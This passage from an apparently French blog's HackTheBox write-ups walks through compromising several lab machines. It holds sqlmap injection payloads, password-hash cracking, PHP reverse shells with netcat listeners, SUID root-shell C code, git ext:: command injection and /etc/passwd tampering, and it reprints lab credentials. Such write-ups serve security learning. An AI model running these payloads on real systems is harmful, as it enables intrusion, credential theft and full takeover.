blind - WHERE or HAVING clause (subquery - comment) Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh\u0026amp;email=leopold\u0026#39; AND 5458=(SELECT (CASE WHEN (5458=5458) THEN 5458 ELSE (SELECT 4624 UNION SELECT 6593) END))-- UEue Type: time-based blind Title: MySQL \u0026gt; 5.0.12 AND time-based blind (heavy query) Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh\u0026amp;email=leopold\u0026#39; AND 1208=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)-- zgvX --- [23:34:25] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.18.0 back-end DBMS: MySQL \u0026gt; 5.0.12 [23:34:25] [INFO] fetching entries of column(s) \u0026#39;password\u0026#39; for table \u0026#39;users\u0026#39; in database \u0026#39;usage_blog\u0026#39; [23:34:25] [INFO] fetching number of column(s) \u0026#39;password\u0026#39; entries for table \u0026#39;users\u0026#39; in database \u0026#39;usage_blog\u0026#39; [23:34:25] [INFO] retrieved: you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y 5 [23:34:38] [INFO] retrieving the length of query output [23:34:38] [INFO] retrieved: 60 [23:37:09] [INFO] retrieved: $2y$10$7ALmTTEYfRVd8Rnyep/ck.bSFKfXfsltPLkyQqSp/TT7X1wApJt4. [23:37:09] [INFO] retrieving the length of query output [23:37:09] [INFO] retrieved: 60 [23:37:19] [INFO] retrieved: ____________________________________________________________ 1 2 3 4 5 brm@brunorochamoura.com davy@wavy.gravy raj@raj.com $2y$10$7ALmTTEYfRVd8Rnyep/ck.bSFKfXfsltPLkyQqSp/TT7X1wApJt4. Crack du mdp On fait une attaque brute force avec john et on trouve le mot de passe suivant pour le hash découvert : xander\nCompte raj@raj.com Après quelques essais, on découvre donc les credentials suivants pour se connecter au website:\nraj@raj.com : xander\nEn realité, ce compte utilisateur est inutile. Par contre, j\u0026rsquo;ai trouvé d\u0026rsquo;autres tables avec les users admin\nUtilisateur Admin 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 Database: usage_blog [15 tables] +------------------------+ | admin_menu | | admin_operation_log | | admin_permissions | | admin_role_menu | | admin_role_permissions | | admin_role_users | | admin_roles | | admin_user_permissions | | admin_users | | blog | | failed_jobs | | migrations | | password_reset_tokens | | personal_access_tokens | | users | +------------------------+ Database: usage_blog Table: admin_users [8 columns] +----------------+--------------+ | Column | Type | +----------------+--------------+ | avatar | varchar(255) | | created_at | timestamp | | id | int unsigned | | name | varchar(255) | | password | varchar(60) | | remember_token | varchar(100) | | updated_at | timestamp | | username | varchar(190) | +----------------+--------------+ Database: usage_blog Table: admin_users [1 entry] +----------+--------------------------------------------------------------+ | username | password | +----------+--------------------------------------------------------------+ | admin | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 | +----------+--------------------------------------------------------------+ Crack admin password admin : whatever1\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 john hash.txt --wordlist=~/wordlists/rockyou.txt Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X2]) Remaining 1 password hash Will run 8 OpenMP threads Press \u0026#39;q\u0026#39; or Ctrl-C to abort, almost any other key for status 0g 0:00:00:20 0% 0g/s 45.39p/s 45.39c/s 45.39C/s wesley..sandy whatever1 (?) 1g 0:00:00:34 100% 0.02906g/s 47.42p/s 47.42c/s 47.42C/s alexis1..punkrock Use the \u0026#34;--show\u0026#34; option to display all of the cracked passwords reliably Session completed ~/github/Hacking/HackTheBox/Machines/Usage (main*) » john hash.txt --wordlist=~/wordlists/rockyou.txt --show leopold@leopold-ZenBook-UX434FAC-UX434FA Invalid options combination or duplicate option: \u0026#34;--show\u0026#34; ~/github/Hacking/HackTheBox/Machines/Usage (main*) » john hash.txt --show ?:xander ?:whatever1 PHP web shell - dash user On peut désormais se connecter sur la plateforme admin. Le lien de ce sous-domaine etait disponible sur la page d\u0026rsquo;accueil. En se connectant, on trouve une page settings permettant de modifier l\u0026rsquo;avatar de l\u0026rsquo;utilisateur admin.\nOn peut alors upload un fichier image. On peut alors cacher un reverse shell dans un fichier gif ou un autre format. Au moment de l\u0026rsquo;upload, on intercepte la requete avec Burp et on modifie le nom du fichier en \u0026ldquo;.php\u0026rdquo;.\nUn bouton s\u0026rsquo;affiche sur la page nous permettant de download le fichier image. En recuperant le lien, on trouve donc où est situé le fichier (et où est le dossiers avec les uploads) : http://admin.usage.htb/uploads/images/revshell.php\nIl ne nous reste plus qu\u0026rsquo;a ouvrir un netcat sur notre machine personelle et d\u0026rsquo;ouvrir un shell sur la machine pour recuperer le flag utilisateur :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 $ nc -lvnp 6789 Listening on 0.0.0.0 6789 Connection received on 10.10.11.18 35690 Linux usage 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux 23:32:32 up 1:54, 0 users, load average: 2.39, 2.47, 2.58 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1000(dash) gid=1000(dash) groups=1000(dash) /bin/sh: 0: can\u0026#39;t access tty; job control turned off $ python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; dash@usage:/$ export TERM=xterm export TERM=xterm dash@usage:/$ ^Z [1] + 21472 suspended nc -lvnp 6789 ~/github/Hacking/HackTheBox/Machines/Usage (main*) » stty raw -echo; [1] + 21472 continued nc -lvnp 6789 dash@usage:/$ whoami dash dash@usage:/$ ls bin dev home lib32 libx32 media opt root sbin srv tmp var boot etc lib lib64 lost+found mnt proc run snap sys usr dash@usage:/$ cd dash@usage:~$ ls user.txt dash@usage:~$ pwd /home/dash dash@usage:~$ cat user.txt 5313.....4bcc Pour exploiter la faille, il fallait donc au minimum selectionner un fichier avec la bonne extension image (et le bon magic byte ? J\u0026rsquo;avais mis GIF8 au début du fichier au cas où). Une fois passer cette étape, en appuyant sur submit et en modifiant la requete au vol, il n\u0026rsquo;y a plus de vérification sur le fichier envoyé donc on peut changer en php il n\u0026rsquo;y aura aucun probleme.\ndash -\u0026gt; xander mmonit service : user password ? Le serveur utilise le service mmonit. On peut trouver un fichier .monitrc intéressant sur le serveur:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 cat .monitrc #Monitoring Interval in Seconds set daemon 60 #Enable Web Access set httpd port 2812 use address 127.0.0.1 allow admin:3nc0d3d_pa$$w0rd #Apache check process apache with pidfile \u0026#34;/var/run/apache2/apache2.pid\u0026#34; if cpu \u0026gt; 80% for 2 cycles then alert #System Monitoring check system usage if memory usage \u0026gt; 80% for 2 cycles then alert if cpu usage (user) \u0026gt; 70% for 2 cycles then alert if cpu usage (system) \u0026gt; 30% then alert if cpu usage (wait) \u0026gt; 20% then alert if loadavg (1min) \u0026gt; 6 for 2 cycles then alert if loadavg (5min) \u0026gt; 4 for 2 cycles then alert if swap usage \u0026gt; 5% then alert check filesystem rootfs with path / if space usage \u0026gt; 80% then alert On trouve les creds: allow admin:3nc0d3d_pa$$w0rd\nXander user pwned Le mdp est en fait celui de l\u0026rsquo;utilisateur xander\u0026hellip; Dans le /home on observe bien un dossier \u0026ldquo;xander\u0026rdquo; que je n\u0026rsquo;avais pas vu dans un premier temps :\nxander : 3nc0d3d_pa$$w0rd\nxander -\u0026gt; root mysql password Dans le fichier .env du site web :\n1 2 3 4 5 6 DB_CONNECTION=mysql DB_HOST=127.0.0.1 DB_PORT=3306 DB_DATABASE=usage_blog DB_USERNAME=staff DB_PASSWORD=s3cr3t_c0d3d_1uth Backup script as root Voir references pour comprendre l\u0026rsquo;exploit. Mais en gros on peut faire sudo d\u0026rsquo;une commande qui fait la backup du site web. Donc des fichiers dans /var/www/html. On peut créer un lien symbolique vers le fichier du flag /root/root.txt et grâce à une faille, avec un fichier @root.txt et à l\u0026rsquo;execution de 7z, on peut recuperer l\u0026rsquo;interieur du fichier. Voir references hacktricks.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 xander@usage:/var/www/html$ touch @root.txt xander@usage:/var/www/html$ ln -s /root/root.txt root.txt xander@usage:/var/www/html$ sudo /usr/bin/usage_management Choose an option: 1. Project Backup 2. Backup MySQL data 3. Reset admin password Enter your choice (1/2/3): 1 7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7513 32-Core Processor (A00F11),ASM,AES-NI) Open archive: /var/backups/project.zip -- Path = /var/backups/project.zip Type = zip Physical Size = 54851331 Scanning the drive: WARNING: No more files 0e99.....4e1b 2984 folders, 17981 files, 114323032 bytes (110 MiB) References 1 2 3 cd /path/to/7z/acting/folder touch @root.txt ln -s /file/you/want/to/read root.txt Then, when 7z is execute, it will treat root.txt as a file containing the list of files it should compress (thats what the existence of @root.txt indicates) and when it 7z read root.txt it will read /file/you/want/to/read and as the content of this file isn\u0026rsquo;t a list of files, it will throw and error showing the content.\nhttps://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks?source=post_page-----16397895490f--------------------------------\n","date":"2024-08-08T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/usage-htb/","title":"HTB | Usage"},{"content":" Machine name OS IP Difficulty Editorial Linux 10.10.11.20 Easy Enumeration nmap 1 2 3 4 5 6 7 Nmap scan report for editorial.htb (10.10.11.20) Host is up (0.65s latency). Not shown: 997 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 7002/tcp filtered afs3-prserver Notes 1 2 submissions@tiempoarriba.htb http://127.0.0.1:5000/api/latest/metadata/messages/authors Foothold SSRF 1 2 3 4 5 6 7 8 9 10 11 12 POST /upload-cover HTTP/1.1 ... ------WebKitFormBoundaryNBB1NG9hyA1AyOej Content-Disposition: form-data; name=\u0026#34;bookurl\u0026#34; http://127.0.0.1:5000/api/latest/metadata/messages/authors ------WebKitFormBoundaryNBB1NG9hyA1AyOej Content-Disposition: form-data; name=\u0026#34;bookfile\u0026#34;; filename=\u0026#34;2664593.png\u0026#34; Content-Type: image/png ‰PNG ... Dans la réponse de l\u0026rsquo;api, on obtient les creds : user: dev password: dev080217_devAPI!@\n1 2 3 4 5 6 7 8 9 10 11 12 HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 04 Aug 2024 23:44:11 GMT Content-Type: application/octet-stream Content-Length: 506 Connection: keep-alive Content-Disposition: inline; filename=f84e3727-b58e-4a33-8cae-f439b5a6a997 Last-Modified: Sun, 04 Aug 2024 23:44:11 GMT Cache-Control: no-cache ETag: \u0026#34;1722815051.1237798-506-4116584587\u0026#34; {\u0026#34;template_mail_message\u0026#34;:\u0026#34;Welcome to the team! We are thrilled to have you on board and can\u0026#39;t wait to see the incredible content you\u0026#39;ll bring to the table.\\n\\nYour login credentials for our internal forum and authors site are:\\nUsername: dev\\nPassword: dev080217_devAPI!@\\nPlease be sure to change your password as soon as possible for security purposes.\\n\\nDon\u0026#39;t hesitate to reach out if you have any questions or ideas - we\u0026#39;re always here to support you.\\n\\nBest regards, Editorial Tiempo Arriba Team.\u0026#34;} SSH to user and prod On trouve repo git. En se deplacant dans les commits :\nEn se connectant a user, on trouve un fichier python avec les creds d\u0026rsquo;un autre utilisateur: user: prod pass: 080217_Producti0n_2023!@\n1 2 3 api_mail_new_authors(): return jsonify({ \u0026#39;template_mail_message\u0026#39;: \u0026#34;Welcome to the team! We are thrilled to have you on board and can\u0026#39;t wait to see the incredible content you\u0026#39;ll bring to the table.\\n\\nYour login credentials for our internal forum and authors site are:\\nUsername: prod\\nPassword: 080217_Producti0n_2023!@\\nPlease be sure to change your password as soon as possible for security purposes.\\n\\nDon\u0026#39;t hesitate to reach out if you have any questions or ideas - we\u0026#39;re always here to support you.\\n\\nBest regards, \u0026#34; + api_editorial_name + \u0026#34; Team.\u0026#34; Privilege Escalation On utilise le compte prod.\nEnumeration 1 2 3 4 5 6 prod@editorial:~$ sudo -l Matching Defaults entries for prod on editorial: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty User prod may run the following commands on editorial: (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py * clone_prod_change.py as root 1 2 3 4 5 6 7 8 9 cat exploit.c ##include \u0026lt;unistd.h\u0026gt; int main() { setuid(0); setgid(0); system(\u0026#34;cat /root/root.txt\u0026#34;); return 0; } Ensuite, on compile le fichier en tant que root. Le fichier exploit est donc créer avec le owner root. Il suffit ensuite d\u0026rsquo;executer un chmod +s, ce qui met le bit SUID à 1. Le bit SUID permet d\u0026rsquo;executer un binaire comme ci on était le owner, même si on est pas connecté en tant que root. Lors de l\u0026rsquo;execution du binaire, on effectue un cat et on obtient le flag root\n1 2 3 4 5 6 7 8 9 10 11 12 prod@editorial:~$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py \u0026#34;ext::sh -c gcc% /home/prod/exploit.c% -o% /home/prod/exploit\u0026#34; ... ... prod@editorial:~$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py \u0026#34;ext::sh -c chmod% +s% /home/prod/exploit\u0026#34; ... ... prod@editorial:~$ ls -l ... -rwsr-sr-x 1 root root 16048 Aug 5 22:47 exploit -rw-rw-r-- 1 prod prod 114 Aug 5 22:45 exploit.c prod@editorial:~$ ./exploit 7e05.....dea0 BONUS Permet d\u0026rsquo;obtenir un shell. Aussi simple que l\u0026rsquo;autre\u0026hellip;\n1 2 3 4 5 6 7 8 #include \u0026lt;unistd.h\u0026gt; int main() { setuid(0); setgid(0); system(\u0026#34;/bin/bash\u0026#34;); return 0; } 1 2 3 4 5 6 7 8 9 10 ## Commandes pour compiler et le chmod +s... ## .... prod@editorial:~$ ./exploit2 root@editorial:~# whoami root root@editorial:~# cd /root root@editorial:/root# ls root.txt root@editorial:/root# cat root.txt 7e05.....dea0 BONUS FINAL Il y avait beaucoup plus rapide\u0026hellip; On fait un cat puis on met dans le /home de prod\u0026hellip; Il reste plus qu\u0026rsquo;a faire un cat du fichier\u0026hellip;\n1 2 3 $ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py \u0026#34;ext::sh -c cat% /root/root.txt% \u0026gt;% /home/prod/hehe\u0026#34; $ cat hehe 7e05.....dea0 ","date":"2024-08-06T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/editorial-htb/","title":"HTB | Editorial"},{"content":" Machine name OS IP Difficulty BoardLight Linux 10.10.11.11 Easy Users 1 larissa : serverfun2$2023!! Enumeration nmap Port 80 et 443 (http et https) ouverts.\nFoothold board.htb -\u0026gt; crm.board.htb Subdomain attack :\n1 2 3 4 5 6 7 8 9 10 11 12 13 gobuster dns -d board.htb -t 50 -w /usr/share/wordlists/dnsmap.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Domain: board.htb [+] Threads: 50 [+] Timeout: 1s [+] Wordlist: /usr/share/wordlists/dnsmap.txt =============================================================== Starting gobuster in DNS enumeration mode =============================================================== Found: crm.board.htb Login page (crm.board.htb) On a acces a une page de login. User : admin mdp : admin\nDashboard - RCE Sur le dashboard Dolibarr on peut créer un site internet. On peut modifier le code html et y mettre du code php. Il faut pour cela modifier la balise car nous n\u0026rsquo;avons pas la permission pour mettre du php:\n1 \u0026lt;?phP echo \u0026#34;haa\u0026#34;; ?\u0026gt; Code php reverse shell.\n1 2 3 4 5 6 7 8 9 10 set_time_limit (0); $VERSION = \u0026#34;1.0\u0026#34;; $ip = \u0026#39;10.10.16.48\u0026#39;; // CHANGE THIS $port = 6789; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = \u0026#39;uname -a; w; id; /bin/sh -i\u0026#39;; $daemon = 0; $debug = 0; Il suffit ensuite de mettre notre reverse shell php dans la page puis de l\u0026rsquo;ouvrir. Sur notre terminal, on se met en attente avec un : nc -lnvp 6789\nUser flag En regardant dans les fichiers de configuration du serveur web, on trouve un mot de passe : serverfun2$2023!! Dans /home, on a observé l\u0026rsquo;utilisateur larissa précédemment. On suppose qu\u0026rsquo;il s\u0026rsquo;agit de son mot de passe et ça marche !\n1 2 3 4 5 6 7 8 9 10 11 www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat * | grep pass ... $dolibarr_main_db_pass=\u0026#39;serverfun2$2023!!\u0026#39;; ... www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ su larissa Password: larissa@boardlight:/var/www/html/crm.board.htb/htdocs/conf$ cat ~/user.txt 6e47.....36af ^C $ ssh larissa@10.10.11.11 Password: serverfun2$2023!! Privilege Escalation Enumeration : LinPEAS Execution d\u0026rsquo;un nouveau linpeas depuis le compte de larissa. On trouve des binaires qui semblent SUID vulnerable.\n1 2 3 4 5 ══════════╣ SUID - Check easy privesc, exploits and write perms -rwsr-xr-x 1 root root 27K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!) -rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!) -rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!) -rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!) CVE-2022–37706 : SUID binary Enlightenment v0.25.3 - Privilege escalation\nhttps://www.exploit-db.com/exploits/51180\nEn executant le fichier exploit.sh trouvé sur github, on obtient directement un accès root. Cette faille permet de trouver un binaire SUID Vulnérable sur la machine, puis de s\u0026rsquo;en servir pour obtenir un shell en tant que root.\n1 2 3 4 5 6 7 8 9 10 11 12 $ ./exploit.sh CVE-2022-37706 [*] Trying to find the vulnerable SUID file... [*] This may take few seconds... [+] Vulnerable SUID binary found! [+] Trying to pop a root shell! [+] Enjoy the root shell :) mount: /dev/../tmp/: can\u0026#39;t find in /etc/fstab. ## whoami root ## cat /root/root.txt 2de2.....893c ","date":"2024-08-04T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/boardlight-htb/","title":"HTB | BoardLight"},{"content":" Machine name OS IP Difficulty PermX Linux 10.10.11.23 Easy Enumeration nmap Port 80 http ouvert.\nFoothold : www-data permx.htb Lorsqu\u0026rsquo;on accede au port 80 sur un navigateur, on est redirigé vers : permx.htb. Je l\u0026rsquo;ai ajouté dans /etc/hosts et j\u0026rsquo;ai accéder à un site internet.\nsubdomain / vhost attack 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 ## Ne trouve rien... $ gobuster dns -d permx.htb -t 50 -w /usr/share/wordlists/dnsmap.txt ## Fonctionne ! (Apparement beaucoup plus fiable que gobuster dns pour trouver les sous-domaines et vhosts...) $ ffuf -w /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -u http://permx.htb/ -H \u0026#34;Host: FUZZ.permx.htb\u0026#34; -mc 200 /\u0026#39;___\\ /\u0026#39;___\\ /\u0026#39;___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://permx.htb/ :: Wordlist : FUZZ: /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt :: Header : Host: FUZZ.permx.htb :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200 ________________________________________________ www [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 544ms] lms [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 502ms] On trouve les sous-domaines :\nwww lms www.permx.htb Renvoie sur la meme page que permx.htb\nlms.permx.htb Renvoie vers une page de login \u0026ldquo;Chamilo\u0026rdquo;\nenumeration des dossiers/fichiers 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 gobuster dir -u lms.permx.htb -w ~/wordlists/common.txt -t 100 =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://lms.permx.htb [+] Method: GET [+] Threads: 100 [+] Wordlist: /home/leopold/wordlists/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /app (Status: 301) [Size: 312] [--\u0026gt; http://lms.permx.htb/app/] /bin (Status: 301) [Size: 312] [--\u0026gt; http://lms.permx.htb/bin/] /certificates (Status: 301) [Size: 321] [--\u0026gt; http://lms.permx.htb/certificates/] /.htaccess (Status: 403) [Size: 278] /documentation (Status: 301) [Size: 322] [--\u0026gt; http://lms.permx.htb/documentation/] /.hta (Status: 403) [Size: 278] /.htpasswd (Status: 403) [Size: 278] /favicon.ico (Status: 200) [Size: 2462] /index.php (Status: 200) [Size: 19356] /LICENSE (Status: 200) [Size: 35147] /main (Status: 301) [Size: 313] [--\u0026gt; http://lms.permx.htb/main/] /plugin (Status: 301) [Size: 315] [--\u0026gt; http://lms.permx.htb/plugin/] /robots.txt (Status: 200) [Size: 748] /server-status (Status: 403) [Size: 278] /src (Status: 301) [Size: 312] [--\u0026gt; http://lms.permx.htb/src/] /vendor (Status: 301) [Size: 315] [--\u0026gt; http://lms.permx.htb/vendor/] /web (Status: 301) [Size: 312] [--\u0026gt; http://lms.permx.htb/web/] /web.config (Status: 200) [Size: 5780] On trouve notamment le fichier web.config qui semble intéressant. (Finalement inutile)\nChamilo LMS CVE-2023-4220 Exploit En cherchant sur internet, on trouve une CVE de 2023 sur Chamilo qui permet d\u0026rsquo;uploader puis d\u0026rsquo;executer un fichier php sur la machine: Exploit Title : Chamilo LMS CVE-2023-4220 Exploit\nEn utilisant la CVE, on upload un reverse shell php :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 ./CVE-2023-4220.sh -f ../php-reverse-shell.php -h http://lms.permx.htb/ -p 6789 -e The file has successfully been uploaded. -e # Use This leter For Interactive TTY ;) ## python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; ## export TERM=xterm ## CTRL + Z ## stty raw -echo; fg -e ## Starting Reverse Shell On Port 6789 . . . . . . . -e Listening on 0.0.0.0 6789 \u0026lt;!DOCTYPE HTML PUBLIC \u0026#34;-//IETF//DTD HTML 2.0//EN\u0026#34;\u0026gt; \u0026lt;html\u0026gt;\u0026lt;head\u0026gt; \u0026lt;title\u0026gt;404 Not Found\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt;\u0026lt;body\u0026gt; \u0026lt;h1\u0026gt;Not Found\u0026lt;/h1\u0026gt; \u0026lt;p\u0026gt;The requested URL was not found on this server.\u0026lt;/p\u0026gt; \u0026lt;hr\u0026gt; \u0026lt;address\u0026gt;Apache/2.4.52 (Ubuntu) Server at lms.permx.htb Port 80\u0026lt;/address\u0026gt; \u0026lt;/body\u0026gt;\u0026lt;/html\u0026gt; ls Connection received on 10.10.11.23 56516 Linux permx 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux 14:35:56 up 5:55, 2 users, load average: 0.00, 0.14, 0.16 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can\u0026#39;t access tty; job control turned off $ $ $ bin boot dev etc home lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin srv sys tmp usr Ensuite, on execute le fichier désormais présent dans le dossier et ça ouvre le reverse shell:\n1 http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/reverseshell.php www-data -\u0026gt; mtz User Found : mtz On trouve le user mtz dans le /home.\nconfiguration.php : mtz password Après l\u0026rsquo;execution de linpeas.sh, on trouve un mot de passe :\n1 2 3 4 5 6 ╔══════════╣ Searching passwords in config PHP files /var/www/chamilo/app/config/configuration.php: \u0026#39;show_password_field\u0026#39; =\u0026gt; false, /var/www/chamilo/app/config/configuration.php: \u0026#39;show_password_field\u0026#39; =\u0026gt; true, ... /var/www/chamilo/app/config/configuration.php:$_configuration[\u0026#39;db_password\u0026#39;] = \u0026#39;03F6lY3uXAP2bkW8\u0026#39;; ... On peut désormais se connecter avec le mot de passe 03F6lY3uXAP2bkW8 pour l\u0026rsquo;utilisateur mtz :\n1 2 3 4 5 6 7 8 9 www-data@permx:/home$ su mtz Password: 03F6lY3uXAP2bkW8 mtz@permx:/home$ cat us cat: us: No such file or directory mtz@permx:/home$ ls mtz mtz@permx:/home$ cd mtz/ mtz@permx:~$ cat user.txt a45e.....7836 Privilege Escalation /opt/acl.sh as root On fait sudo -l, on observe que l\u0026rsquo;on peut executer le script suivant en tant que root : /opt/acl.sh\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ##!/bin/bash if [ \u0026#34;$#\u0026#34; -ne 3 ]; then /usr/bin/echo \u0026#34;Usage: $0 user perm file\u0026#34; exit 1 fi user=\u0026#34;$1\u0026#34; perm=\u0026#34;$2\u0026#34; target=\u0026#34;$3\u0026#34; if [[ \u0026#34;$target\u0026#34; != /home/mtz/* || \u0026#34;$target\u0026#34; == *..* ]]; then /usr/bin/echo \u0026#34;Access denied.\u0026#34; exit 1 fi ## Check if the path is a file if [ ! -f \u0026#34;$target\u0026#34; ]; then /usr/bin/echo \u0026#34;Target must be a file.\u0026#34; exit 1 fi /usr/bin/sudo /usr/bin/setfacl -m u:\u0026#34;$user\u0026#34;:\u0026#34;$perm\u0026#34; \u0026#34;$target\u0026#34; Il permet de modifier les droits de n\u0026rsquo;importe quel fichier. Cependant, il faut que ce fichier soit dans /home/mtz et qu\u0026rsquo;il soit un fichier, pas un lien symbolique.\nLa technique consiste donc à créer deux liens symboliques qui vont vers le fichier qui nous intéresse. Ensuite on change les droits\nJ\u0026rsquo;ai donc modifier les droits de /etc/passwd pour pouvoir le modifier en tant que mtz. On ajoute un utilisateur hacker, avec le mdp \u0026ldquo;password\u0026rdquo; qui a les droits root On se connecte à hacker et on affiche le fichier root.txt avec le flag.\n!!ATTENTION!!, il y a une contab qui retablit les fichiers /etc/passwd et qui supprime les liens symboliques dans /home/mtz donc il faut le faire rapidement\u0026hellip;\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 $ ln -s /etc/passwd .a \u0026amp;\u0026amp; ln -s .a .b \u0026amp;\u0026amp; sudo /opt/acl.sh mtz rwx /home/mtz/.b \u0026amp;\u0026amp; cat /etc/passwd ## Affichage de /etc/passwd ## Ajout d\u0026#39;un utilisateur hacker avec les droits root et le mot de passe \u0026#34;password\u0026#34; $ vi /etc/passwd ... ... hacker:$6$XbyWNHgUybMiBnVK$FOoR2G.C.YAk0TAzOcf2igmcoVWkJtzDQgs7C4TmE7fazCwasTsutVY.5AR8CkiA7cBcGGx8cHdPtUUdkXOGA1:0:0::/root:/bin/bash $ su hacker Password: password $ cat /root/root.txt 1808.....4142 ","date":"2024-08-04T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/permx-htb/","title":"HTB | PermX"},{"content":" Machine name OS IP Difficulty Devvortex Linux 10.10.11.242 Easy Enumeration nmap 1 2 3 4 5 6 $ nmap -sC -sV -An -T4 -p- 10.10.11.242 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://devvortex.htb/ Subdomain enumeration : gobuster Il faut utiliser gobuster pour faire une enumeration des subdomains !\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ─$ gobuster dns -d devvortex.htb -t 50 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Domain: devvortex.htb [+] Threads: 50 [+] Timeout: 1s [+] Wordlist: /usr/share/wordlists/dirb/common.txt =============================================================== Starting gobuster in DNS enumeration mode =============================================================== Found: dev.devvortex.htb Progress: 4614 / 4615 (99.98%) =============================================================== Finished =============================================================== Foothold gosbuster dev.devortex.htb 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 